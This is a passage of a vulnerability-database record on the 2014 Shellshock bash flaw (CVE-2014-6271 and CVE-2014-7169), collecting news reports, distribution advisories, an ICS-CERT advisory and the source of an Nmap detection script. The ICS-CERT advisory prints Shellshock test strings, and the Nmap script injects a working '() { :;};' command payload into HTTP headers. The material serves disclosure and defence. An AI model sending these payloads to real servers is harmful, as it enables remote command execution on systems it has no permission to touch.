bash security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T10:07:05", "bulletinFamily": "info", "description": "[](<https://4.bp.blogspot.com/-eVb9SURqAUA/VCZfla7DcDI/AAAAAAAAge4/jxEUhn1kdWY/s1600/Shellshock-Bash-Vulnerability-exploit.jpg>)\n\nResearchers on Thursday discovered a critical remotely exploitable vulnerability in the widely used command-line shell GNU Bourne Again Shell (**Bash**), dubbed \"[Shellshock](<https://thehackernews.com/2014/09/bash-shell-vulnerability-shellshock.html>)\" which affects most of the Linux distributions and servers worldwide, and may already have been exploited in the wild to take over Web servers as part of a [botnet](<https://thehackernews.com/search/label/botnet>) that is currently trying to infect other servers as well.\n\n \n**BOTNET ATTACK IN THE WILD**\n\nThe bot was discovered by the security researcher with the Twitter handle **_@yinettesys_**, who reported it on [Github](<https://gist.github.com/anonymous/929d622f3b36b00c0be1>) and said it appeared to be remotely controlled by miscreants, which indicates that the vulnerability is already being used maliciously by the hackers.\n\n \n\n\nThe vulnerability **_(CVE-2014-6271)_**, which came to light on Wednesday, affects versions 1.14 through 4.3 of GNU Bash and could become a dangerous threat to Linux/Unix and Apple users if the patches to BASH are not applied to the operating systems. \n\n \n\n\nHowever, the patches for the vulnerability were released but there was some concern that the initial fix for the issue still left Bash vulnerable to attack, according to a new [US CERT](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169>) National Vulnerability Database entry. There is as of yet no official patch that completely addresses both vulnerabilities, including the second, which allows an attacker to overwrite files on the targeted system. \n \n**SHELLSHOCK vs THE INTERNET**\n\n_Robert Graham_ of _Errata Security _observed that the major internet scan is already being used by the cyber criminals in order to locate vulnerable servers for cyber attack. During a scan, Graham found about 3,000 servers that were vulnerable \"_just on port 80_\" \u2014 the Internet Protocol port used for normal Web Hypertext Transfer Protocol (HTTP) requests. \n\n \n\n\nThe Internet scan broke after a short while, which means that there could be a wide numbers of other servers vulnerable to the attack.\n\n> \"_It's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi),_\" Graham wrote in a [blog post](<http://blog.erratasec.com/2014/09/bash-shellshock-bug-is-wormable.html#.VCY8B_nSlcp>). \"_Getting just the root page is the thing least likely to be vulnerable. Spidering the site and testing well-known CGI scripts (like the CPanel one) would give a lot more results\u2014at least 10x_.\"\n\n> In addition, Graham said, \"_this thing is clearly wormable and can easily worm past firewalls and infect lots of systems. One key question is whether Mac OS X and iPhone DHCP service is vulnerable\u2014once the worm gets behind a firewall and runs a hostile DHCP server, that would be 'game over' for large networks._\"\n\n \n**32 ORACLE PRODUCTS VULNERABLE** \nOracle has also confirmed that over 32 of its products are affected by the \"Shellshock\" vulnerability including some expensive integrated hardware systems of the company. The company warned its users to wait a bit longer for the complete patch, by issuing a security alert regarding the Bash bug on Friday. \n\n\n> \"_Oracle is still investigating this issue and will provide fixes for affected products as soon as they have been fully tested and determined to provide effective mitigation against the vulnerability,_\" the company [said](<http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html>). \n\n**PATCH ISSUED, BUT INCOMPLETE** \nPatches were released from most of the Linux distributions, but Red Hat has updated an [advisory ](<https://access.redhat.com/articles/1200223>)warning that the patch is incomplete, the same issue that was also raised by infosec community on Twitter.\n\n> \"_Red Hat has become aware that the patches shipped for this issue are incomplete,_\" said Red Hat security engineer Huzaifa Sidhpurwala. \"_An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions The new issue has been assigned CVE-2014-7169._\"\n\nAlthough people are urged to apply the released patch to thwart most attacks on the affected systems, another patch is expected to release as soon as possible.\n", "modified": "2014-09-27T07:07:32", "published": "2014-09-26T20:07:00", "id": "THN:491E94A14CDEFCFFF9753033F61D1E0E", "href": "https://thehackernews.com/2014/09/Shellshock-Bash-Vulnerability-exploit.html", "type": "thn", "title": "Hackers Using 'Shellshock' Bash Vulnerability to Launch Botnet Attacks", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:02", "bulletinFamily": "unix", "description": "### Background\n\nBash is the standard GNU Bourne Again SHell.\n\n### Description\n\nStephane Chazelas reported that Bash incorrectly handles function definitions, allowing attackers to inject arbitrary code (CVE-2014-6271). Gentoo Linux informed about this issue in GLSA 201409-09. \n\nTavis Ormandy reported that the patch for CVE-2014-6271 was incomplete. As such, this GLSA supersedes GLSA 201409-09. \n\n### Impact\n\nA remote attacker could exploit this vulnerability to execute arbitrary commands even in restricted environments. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Bash 3.1 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-shells/bash-3.1_p18-r1:3.1\"\n \n\nAll Bash 3.2 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-shells/bash-3.2_p52-r1:3.2\"\n \n\nAll Bash 4.0 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-shells/bash-4.0_p39-r1:4.0\"\n \n\nAll Bash 4.1 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-shells/bash-4.1_p12-r1:4.1\"\n \n\nAll Bash 4.2 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-shells/bash-4.2_p48-r1\"", "modified": "2014-10-04T00:00:00", "published": "2014-09-25T00:00:00", "id": "GLSA-201409-10", "href": "https://security.gentoo.org/glsa/201409-10", "type": "gentoo", "title": "Bash: Code Injection (Updated fix for GLSA 201409-09)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:05", "bulletinFamily": "info", "description": "The urgency to patch systems against the [Bash zero-day vulnerability](<http://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521>) has been cranked to 10 after reports of an exploit in the wild have been made public by [AusCERT](<https://www.auscert.org.au/20652>), the Computer Emergency Response Team of Australia.\n\nThis seems to reflect a similar finding posted by a researcher who goes by the handle Yinette who found a [malware sample](<https://gist.github.com/anonymous/929d622f3b36b00c0be1>) that points to a bot being distributed by the exploit.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/09/07014510/david_jacoby.jpg>)Other researchers, including David Jacoby of Kaspersky Lab, right and podcast below, and Robert Graham of Errata Security also cautioned that the [Bash vulnerability is wormable](<http://blog.erratasec.com/2014/09/bash-shellshock-bug-is-wormable.html#.VCP-0fn-OSo>) and that one is inevitable. Graham, who built an Internet scanner called Masscan, published early results on a search for vulnerable systems that returned 3,000 vulnerable systems on port 80. He said embedded web servers and other services such as DHCP are in real danger.\n\n\u201cEven though my light scan found only 3000 results, this thing is clearly wormable, and can easily worm past firewalls and infect lots of systems,\u201d Graham wrote, adding that he intentionally limited the scope of the scan which included a ping-home command from vulnerable servers to his server.\n\n\u201cOne key question is whether Mac OS X and iPhone DHCP service is vulnerable \u2014 once the worm gets behind a firewall and runs a hostile DHCP server, that would \u2018game over\u2019 for large networks.\u201d\n\nThe exploit reported by Yinette, meanwhile, has a zero detection rate on [VirusTotal](<https://www.virustotal.com/en/file/73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489/analysis/1411634118/>) and has been given the identifier [CVE-2014-6271](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271>). Patches were available yesterday from most of the Linux distributions, but already Red Hat has updated an [advisory](<https://access.redhat.com/articles/1200223>) warning that the patch is incomplete and that specially crafted environment variables will execute arbitrary code. A new identifier, [CVE-2014-7169](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169>), explains this issue in detail. Red Hat said that it will issue a new patch.\n\n* * *\n\n**PODCAST:** Digital Underground \u2013 David Jacoby on the Bash Exploit\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2014/09/07014512/David-Jacoby-on-the-Bash-Exploit.mp3>\n\n* * *\n\nBash, short for the Bourne again shell, is an embedded command-line shell program present on most Linux, UNIX and Mac OS X systems. The problem presented by this vulnerability is that Bash is quietly accessed by various functions, which makes comprehensive patching a massive challenge. The flaw allows an attacker to remotely attach a malicious executable to a variable that is executed when Bash is invoked.\n\n\u201cIt\u2019s super simple and every version of Bash is vulnerable,\u201d Josh Bressers, manager of Red Hat product security, told Threatpost yesterday. \u201cIt\u2019s extremely serious, but you need very specific conditions in place where a remote user would be able to set that environment variable. Thankfully, it\u2019s not common.\u201d\n\nSome of the more critical instances where the vulnerability may be exposed is on Apache servers for example, using mod_cgi or mod_cgid if either of those scripts is written in Bash. The vulnerability can also be used to bypass ForceCommand in sshd configs, Bressers said. ForceCommand is supposed to limit remote code execution, but exploiting this vulnerability sidesteps that protection. Some Git deployments over SSH would be affected here.\n\nThe bug was discovered by Stephane Chazelas, and it has already drawn comparisons to the Heartbleed OpenSSL bug. Like Heartbleed, the danger isn\u2019t in vulnerable web servers that can be easily found and patched, but in any number of software packages on embedded systems and Internet-facing devices.\n\n\u201cUnlike Heartbleed, which only affected a specific version of OpenSSL, this _bash_ bug has been around for a long, long time,\u201d Graham wrote. \u201cThat means there are _lots_ of old devices on the network vulnerable to this bug. The number of systems needing to be patched, but which won\u2019t be, is much larger than Heartbleed.\u201d\n", "modified": "2014-09-26T16:21:47", "published": "2014-09-25T11:41:51", "id": "THREATPOST:1DED483898A12D8F4397D8C01339AC63", "href": "https://threatpost.com/bash-exploit-reported-first-round-of-patches-incomplete/108550/", "type": "threatpost", "title": "Bash Botnet Exploit Found, Bash Patches Incomplete", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ics": [{"lastseen": "2019-10-23T22:47:26", "bulletinFamily": "info", "description": "## OVERVIEW\n\nThis updated advisory is a follow-up to the original advisory titled ICSA-14-269-01 Bash Command Injection Vulnerability that was published September 26, 2014, on the NCCIC/ICS\u2011CERT web site.\n\nA command injection vulnerability has been reported in the Bourne again shell (bash). Bash is the common command-line used in most Linux/Unix-based operating systems and Apple\u2019s Mac OS X. The flaw could allow an attacker to remotely execute shell commands by attaching malicious code in environment variables used by the operating system.\n\nIndustrial control systems running embedded versions of Linux may not be field upgradeable are of particular concern and may require alternate mitigation.\n\nPatches have been released to fix this vulnerability by major Linux vendors for affected versions. Solutions for CVE-2014-6271 do not completely resolve the vulnerability. It is advised to install existing patches and pay attention for updated patches to address CVE-2014-7169.\n\nExploits that target this vulnerability are publicly available.\n\nAs bash is a third-party component, asset owners, operators, and SCADA product developers are encouraged to investigate the use of the affected versions of bash in their environments. ICS-CERT encourages any asset owners/operators, developers, or vendors to coordinate known implementations of the affected products directly with ICS-CERT.\n\n## AFFECTED PRODUCTS\n\nThe following bash versions are affected:\n\n * GNU bash versions 1.14 to 4.3\n * Linux, BSD, and UNIX distributions including but not limited to:\n * [CentOS](<http://lists.centos.org/pipermail/centos/2014-September/146099.html>)\n * [Debian](<https://lists.debian.org/debian-security-announce/2014/msg00220.html>)\n * Mac OS X\n * Red Hat Enterprise\n * Ubuntu\n\nUsers may use Nessus to determine if their devices are running a vulnerable bash version:\n\n * GNU Bash Environment Variable Handling Code Injection (Shellshock) \nh[tt]p://[www].tenable.com/plugins/index.php?view=single&id=77829 \n<http://tinyurl.com/p8fxk8e> (provided because issues reported with redirect)\n * Bash Remote Code Execution (Shellshock) \nh[tt]p://[www].tenable.com/plugins/index.php?view=single&id=77823 \n<http://tinyurl.com/q6218p2> (provided because issues reported with redirect)\n\n### **\\--------- Begin Update A Part 1 of 1 --------**\n\nICS-CERT sent out a query to vendors we have collaborated with in the past. Many have responded back with information about which products are affected by this bash vulnerability. ICS-CERT created a supplement to this advisory that contains this information. It can be found at the following web location: https://ics-cert.us-cert.gov/advisories/Supplement-ICSA-14-269-01. This supplement will be updated with additional information as it becomes available, without updating this advisory.\n\n### **\\--------- End Update A Part 1 of 1 ----------**\n\n## IMPACT\n\nAn exploit using this vulnerability could allow an attacker to remotely execute arbitrary commands. \n\nThis vulnerability is classified by industry standards as \u201cHigh\u201d impact with CVSS Impact Subscore 10 and \u201cLow\u201d on complexity, which means it takes little skill to perform. This flaw allows attackers to provide specially crafted environment variables containing arbitrary commands that can be executed on vulnerable systems. It is especially dangerous because of the prevalent use of the bash shell and its ability to be called by an application in numerous ways.a\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability as based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nBash is a command processor that allows users to type or input stored commands via a script. Originally written as a Unix shell by Brian Fox for the GNU project, it has become the default shell on Linux and Mac OS X. Various product adaptations have brought this shell to Microsoft (Cygwin and MinGW), DOS, Novell NetWare, and Android. Bash supports wildcards in file names, piping, variables, command substitution, and condition testing.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### OS COMMAND INJECTIONSb\n\nGNU bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment. OpenSSH, Apache HTTP Server, and DHCP clients could be particularly vulnerable.\n\nCVE-2014-6271c has been assigned to this vulnerability. A CVSS v2 base score of 10.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:C/I:C/A:C).d \n\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nThere are several functional mitigations for this vulnerability including upgrading to a new version of bash, replacing bash with an alternate shell, limiting access to vulnerable services, and/or filtering inputs to vulnerable services.\n\nPatches have been released to fix this vulnerability by major Linux vendors for affected versions; however, solutions for CVE-2014-6271 do not completely resolve the vulnerability. It is advised to install existing patches and pay attention for updated patches to address CVE-2014-7169.e\n\nMany UNIX-like operating systems, including Linux distributions, BSD variants, and Apple Mac OS X include bash and are likely to be affected. Contact your respective Linux or Unix-based OS vendor(s) for updated information. A list of vendors can be found in CERT Vulnerability Note VU#252743.f\n\nICS-CERT recommends system administrators review the vendor patches and the NIST Vulnerability Summary for CVE-2014-7169e, to mitigate damage caused by the exploit\n\nOther helpful resources include:\n\n * <https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/>\n * <http://lists.gnu.org/archive/html/bug-bash/2014-09/threads.html>\n * https://www.us-cert.gov/ncas/current-activity/2014/09/24/Bourne-Again-Shell-Bash-Remote-Code-Execution-Vulnerability\n * https://www.us-cert.gov/ncas/alerts/TA14-268A\n * <https://www.cert.gov.uk/resources/alerts/update-bash-vulnerability-aka-shellshock/>\n\nSupport Information:\n\n 1. [Novel/SuSE](<http://support.novell.com/security/cve/CVE-2014-6271.html>)\n 2. [Debian](<https://www.debian.org/security/2014/dsa-3032>)\n 3. [Ubuntu](<http://www.ubuntu.com/usn/usn-2362-1/>)\n 4. Mint (No link at this time)\n 5. [Redhat/Fedora](<https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-6271>)\n 6. Mageia (No link at this time)\n 7. [CentOS](<http://centosnow.blogspot.com/2014/09/critical-bash-updates-for-centos-5.html>)\n\nAs bash may be used as a third-party component, asset owners, operators, and ICS software developers are encouraged to investigate the use of the affected versions of bash in their environments.\n\nThe ST and PT ISAC released the following test string to determine detect vulnerable installations.\n\nTo check if you are patched, you can use the original test string:\n\nenv x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"\n\nIf you are patched, but want to demonstrate that you are still vulnerable, you can use this command:\n\nenv X='() { (a)=>\\' bash -c \"echo date\";\n\nThis command will return an error on a patched system, but it will still create a file with the output of `date` in a file called \"echo\".\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B\u2014Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (www.ics-cert.org).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\nIn addition, ICS-CERT recommends that users take the following measures to protect themselves from social engineering attacks:\n\n 1. Do not click web links or open unsolicited attachments in email messages.\n 2. Refer to Recognizing and Avoiding Email Scamsg for more information on avoiding email scams.\n 3. Refer to Avoiding Social Engineering and Phishing Attacksh for more information on social engineering attacks.\n\n * a. https://www.us-cert.gov/ncas/alerts/TA14-268A, web site last accessed September 26, 2014.\n * b. CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), http://cwe.mitre.org/data/definitions/78.html, web site last accessed September 25, 2014.\n * c. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * d. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:C/I:C/A:C, web site last accessed September 25, 2014.\n * e. Vulnerability Summary for CVE-2014-7169 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169, web site last accessed September 26, 2014.\n * f. Vulnerability Note VU#252743, http://www.kb.cert.org/vuls/id/252743, web site last accessed September 26, 2014.\n * g. Recognizing and Avoiding Email Scams, http://www.us-cert.gov/reading_room/emailscams_0905.pdf, web site last accessed September 26, 2014. \n * h. National Cyber Alert System Cyber Security Tip ST04-014, http://www.us-cert.gov/cas/tips/ST04-014.html, web site last accessed September 26, 2014. \n\n## \nContact Information\n\nFor any questions related to this report, please contact the NCCIC at: \n \nEmail: [NCCICCUSTOMERSERVICE@hq.dhs.gov](<mailto:NCCICCUSTOMERSERVICE@hq.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: http://ics-cert.us-cert.gov \nor incident reporting: https://ics-cert.us-cert.gov/Report-Incident?\n\nThe NCCIC continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "modified": "2018-09-06T00:00:00", "published": "2014-10-15T00:00:00", "id": "ICSA-14-269-01A", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-269-01A", "title": "Bash Command Injection Vulnerability (Update A)", "type": "ics", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nmap": [{"lastseen": "2019-05-30T17:05:17", "bulletinFamily": "scanner", "description": "Attempts to exploit the \"shellshock\" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications. \n\nTo detect this vulnerability the script executes a command that prints a random string and then attempts to find it inside the response body. Web apps that don't print back information won't be detected with this method. \n\nBy default the script injects the payload in the HTTP headers User-Agent, Cookie, Referer and also uses the payload as the header name. \n\nVulnerability originally discovered by Stephane Chazelas. \n\nReferences: \n\n * http://www.openwall.com/lists/oss-security/2014/09/24/10\n * http://seclists.org/oss-sec/2014/q3/685\n * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271\n\n## Script Arguments \n\n#### http-shellshock.uri \n\nURI. Default: /\n\n#### http-shellshock.header \n\nHTTP header to use in requests. Default: User-Agent\n\n#### http-shellshock.cmd \n\nCustom command to send inside payload. Default: nil\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -sV -p- --script http-shellshock <target>\n nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-shellshock:\n | VULNERABLE:\n | HTTP Shellshock vulnerability\n | State: VULNERABLE (Exploitable)\n | IDs: CVE:CVE-2014-6271\n | This web application might be affected by the vulnerability known as Shellshock. It seems the server\n | is executing commands injected via malicious HTTP headers.\n |\n | Disclosure date: 2014-09-24\n | References:\n | http://www.openwall.com/lists/oss-security/2014/09/24/10\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\n | http://seclists.org/oss-sec/2014/q3/685\n |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271\n \n\n## Requires \n\n * http\n * shortport\n * stdnse\n * string\n * vulns\n * rand\n\n* * *\n", "modified": "2018-09-08T17:07:06", "published": "2015-01-17T03:01:58", "id": "NMAP:HTTP-SHELLSHOCK.NSE", "href": "https://nmap.org/nsedoc/scripts/http-shellshock.html", "title": "http-shellshock NSE Script", "type": "nmap", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\nlocal rand = require \"rand\"\n\ndescription = [[\nAttempts to exploit the \"shellshock\" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.\n\nTo detect this vulnerability the script executes a command that prints a\nrandom string and then attempts to find it inside the response body. Web apps that\n don't print back information won't be detected with this method.\n\nBy default the script injects the payload in the HTTP headers User-Agent,\n Cookie, Referer and also uses the payload as the header name.\n\nVulnerability originally discovered by Stephane Chazelas.\n\nReferences:\n* http://www.openwall.com/lists/oss-security/2014/09/24/10\n* http://seclists.org/oss-sec/2014/q3/685\n* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\n* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271\n]]\n\n---\n-- @usage\n-- nmap -sV -p- --script http-shellshock <target>\n-- nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-shellshock:\n-- | VULNERABLE:\n-- | HTTP Shellshock vulnerability\n-- | State: VULNERABLE (Exploitable)\n-- | IDs: CVE:CVE-2014-6271\n-- | This web application might be affected by the vulnerability known as Shellshock. It seems the server\n-- | is executing commands injected via malicious HTTP headers.\n-- |\n-- | Disclosure date: 2014-09-24\n-- | References:\n-- | http://www.openwall.com/lists/oss-security/2014/09/24/10\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\n-- | http://seclists.org/oss-sec/2014/q3/685\n-- |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271\n--\n-- @xmloutput\n-- <elem key=\"title\">HTTP Shellshock vulnerability</elem>\n-- <elem key=\"state\">VULNERABLE (Exploitable)</elem>\n-- <table key=\"ids\">\n-- <elem>CVE:CVE-2014-6271</elem>\n-- </table>\n-- <table key=\"description\">\n-- <elem>This web application might be affected by the vulnerability known as Shellshock. It seems the server\n-- 
is executing commands injected via malicious HTTP headers. 
 </elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"year\">2014</elem>\n-- <elem key=\"day\">24</elem>\n-- <elem key=\"month\">09</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">2014-09-24</elem>\n-- <table key=\"refs\">\n-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169</elem>\n-- <elem>http://www.openwall.com/lists/oss-security/2014/09/24/10</elem>\n-- <elem>http://seclists.org/oss-sec/2014/q3/685</elem>\n-- <elem>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271</elem>\n-- </table>\n-- @args http-shellshock.uri URI. Default: /\n-- @args http-shellshock.header HTTP header to use in requests. Default: User-Agent\n-- @args http-shellshock.cmd Custom command to send inside payload. Default: nil\n---\nauthor = {\"Paulino Calderon <calderon()websec.mx\",\"Paul Amar <paul()sensepost com>\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"exploit\",\"vuln\",\"intrusive\"}\n\nportrule = shortport.http\n\nfunction generate_http_req(host, port, uri, custom_header, cmd)\n local rnd = nil\n --Set custom or probe with random string as cmd\n if cmd ~= nil then\n cmd = '() { :;}; '..cmd\n else\n rnd = rand.random_alpha(15)\n cmd = '() { :;}; echo; echo \"'..rnd..'\"'\n end\n -- Plant the payload in the HTTP headers\n local options = {header={}}\n options[\"no_cache\"] = true\n if custom_header == nil then\n stdnse.debug1(\"Sending '%s' in HTTP headers:User-Agent,Cookie and Referer\", cmd)\n options[\"header\"][\"User-Agent\"] = cmd\n options[\"header\"][\"Referer\"] = cmd\n options[\"header\"][\"Cookie\"] = cmd\n options[\"header\"][cmd] = cmd\n else\n stdnse.debug1(\"Sending '%s' in HTTP header '%s'\", cmd, custom_header)\n options[\"header\"][custom_header] = cmd\n end\n local req = http.get(host, port, uri, options)\n\n if not(cmd) then\n return req\n else\n return req, rnd\n end\nend\n\naction = function(host, port)\n local cmd = stdnse.get_script_args(SCRIPT_NAME..\".cmd\") or nil\n local http_header = stdnse.get_script_args(SCRIPT_NAME..\".header\") or nil\n local uri = stdnse.get_script_args(SCRIPT_NAME..\".uri\") or '/'\n local rnd = nil\n local req, rnd = generate_http_req(host, port, uri, http_header, nil)\n if req.status == 200 and string.match(req.body, rnd) ~= nil then\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n local vuln = {\n title = 'HTTP Shellshock vulnerability',\n state = vulns.STATE.NOT_VULN,\n description = [[\nThis web application might be affected by the vulnerability known as Shellshock. It seems the server\nis executing commands injected via malicious HTTP headers.\n ]],\n IDS = {CVE = 'CVE-2014-6271'},\n references = {\n 'http://www.openwall.com/lists/oss-security/2014/09/24/10',\n 'http://seclists.org/oss-sec/2014/q3/685',\n 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169'\n },\n dates = {\n disclosure = {year = '2014', month = '09', day = '24'},\n },\n }\n stdnse.debug1(\"Random pattern '%s' was found in page. Host seems vulnerable.\", rnd)\n vuln.state = vulns.STATE.EXPLOIT\n if cmd ~= nil then\n req = generate_http_req(host, port, uri, http_header, cmd)\n vuln.exploit_results = req.body\n end\n return vuln_report:make_output(vuln)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:21:10", "bulletinFamily": "unix", "description": "The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and is less serious due to the\n special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_.\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally, two other security issues have been fixed:\n\n * CVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n * CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\n\n Security Issues:\n\n * CVE-2014-7169\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169</a>>\n * CVE-2014-7186\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186</a>>\n * CVE-2014-7187\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187</a>>\n\n", "modified": "2014-09-28T19:05:16", "published": "2014-09-28T19:05:16", "id": "SUSE-SU-2014:1247-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00042.html", "type": "suse", "title": "Security update for bash (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-12-11T13:31:59", "bulletinFamily": "unix", "description": "The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, 